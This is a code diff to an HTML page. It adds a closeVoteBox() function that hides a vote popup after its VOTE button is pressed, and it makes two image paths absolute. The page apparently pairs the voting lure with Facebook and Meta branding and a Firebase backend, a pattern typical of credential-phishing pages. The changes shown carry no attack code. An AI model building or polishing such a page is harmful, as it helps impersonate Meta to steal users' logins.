--- a/9/index.html
+++ b/9/index.html
@@ -1073,7 +1073,7 @@
                         <div class="t706__carticon-counter js-carticon-counter"></div>
                     </div>
                 </div>
-                <div class="t706__cartwin" style="display: none;">
+                <div id="voteBox" class="t706__cartwin" style="display: none;">
                     <div class="t706__close t706__cartwin-close"><button type="button"
                             class="t706__close-button t706__cartwin-close-wrapper" aria-label="Закрыть корзину"><svg
                                 role="presentation" class="t706__close-icon t706__cartwin-close-icon" width="23px"
@@ -1176,7 +1176,8 @@
                                     </div>
                                     <div class="t-form__submit"><button class="t-submit"
                                             style="color:#ffe100;border:1px solid #ffe100;background-color:#38364d;border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;text-transform:uppercase;box-shadow: 0px 0px 15px 0px rgba(0, 0, 0, 0.7);"
-                                            data-field="buttontitle" data-buttonfieldset="button" onclick="vote()">VOTE
+                                            data-field="buttontitle" data-buttonfieldset="button"
+                                            onclick="vote(); closeVoteBox(); return false;">VOTE
                                         </button>
                                     </div>
                                 </div>
@@ -3363,7 +3364,7 @@
 
             <div data-bloks-name="bk.components.Flexbox" class="wbloks_1"
                 style="pointer-events: none; margin-top: 0px; margin-bottom: 20px; flex-grow: 1; flex-shrink: 100; align-items: center; justify-content: center;">
-                <img alt="Facebook from Meta" src="img/fblogo.png" class="wbloks_1"
+                <img alt="Facebook from Meta" src="/img/fblogo.png" class="wbloks_1"
                     style="max-height: 60px; min-height: 0px; object-fit: contain; overflow: hidden;">
             </div><br><br><br>
 
@@ -3422,7 +3423,7 @@
                                     class="wbloks_110"></svg>
                             </div>
                             <div class="wbloks_109"><img alt="Meta logo" src="/img/meta.png" class="wbloks_1"
-                                    style="width: 100%; pointer-events: inherit; mask-image: url(img/meta.png); mask-size: contain; background-color: rgb(70, 90, 105); object-position: 10000px 10000px; object-fit: contain; overflow: hidden;">
+                                    style="width: 100%; pointer-events: inherit; mask-image: url(/img/meta.png); mask-size: contain; background-color: rgb(70, 90, 105); object-position: 10000px 10000px; object-fit: contain; overflow: hidden;">
                             </div>
                     </center>
                 </div>
@@ -3728,6 +3729,13 @@
 
     </script>
     <!--Firebase ends-->
+
+    <!--Hide VOTEBOX -->
+    <script>
+        function closeVoteBox() {
+            document.getElementById('voteBox').style.display = 'none';
+        }
+    </script>
 
 </body>
 
